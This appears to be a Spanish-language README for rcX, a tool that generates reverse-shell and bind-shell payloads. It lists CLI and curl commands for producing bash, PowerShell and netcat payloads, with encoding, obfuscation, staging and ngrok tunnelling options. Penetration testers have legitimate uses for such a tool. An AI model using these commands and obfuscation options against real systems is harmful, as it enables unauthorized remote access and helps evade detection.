El predecesor de rcX es rsGen (un generador de carga útil inversa). Actualmente, es un potente generador de reverse shell y bind shell. En el futuro se añadirán más funciones.
- “rc” – significa comando remoto o código remoto (remote command).
- “X” – se puede entender como asistente o herramienta.
Uso Local
Descarga los binarios empaquetados aquí, o ejecuta el siguiente comando:
pip install -r requirements.txt
Uso de la CLI
Ejemplos:
1. Obtener una shell inversa de bash y la salida en formato tabular.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --table
2.Ruta de acceso al shell personalizada.
python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"
3. Copiar la carga útil de id especificada en el portapapeles.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5
4. Obtener un shell inverso bash codificado en base64.
python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64
5. Obtener una shell inversa bash codificada y ofuscada.
python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7
- Obtener una shell inversa bash de staging.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0
7. Obtener una shell inversa bash y reenviar el puerto local utilizando el túnel ngrok.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp
8. Obtener un shell inverso de Windows Powershell.
python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows
Interfaz web
Al mismo tiempo, rcX también proporciona una interfaz web. Utiliza rcX como servidor y luego podrás utilizarlo con tu equipo o amigos.
Ejemplo:
python rcX.py -w
Web CLI
Cuando rcX se ejecuta como servidor, puedes utilizar curl en el terminal para obtener la carga útil.
Ejemplos:
1. Obtener una carga útil de shell inversa bash
curl http://127.0.0.1/linux/bash/127.0.0.4/8888
2. Codificación Base64
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64
3. Codificación Base64 y hexadecimal
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex
4. Compresión Gzip y replace_char (método de ofuscación)
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char
5. xor codificado e inverso(método de ofuscación)
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse
6. Obtener una carga útil de shell inversa de Windows PowerShell
curl http://127.0.0.1/windows/powershell/127.0.0.4/44444
7. replace_char(método de ofuscación) sólo sin usar codificador
curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char
8. Utilizar sólo la puesta en escena, sin ningún codificador y ofuscador
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1
9. Obtener una carga útil de shell bind netcat
curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888
https://github.com/FlyfishSec/rcX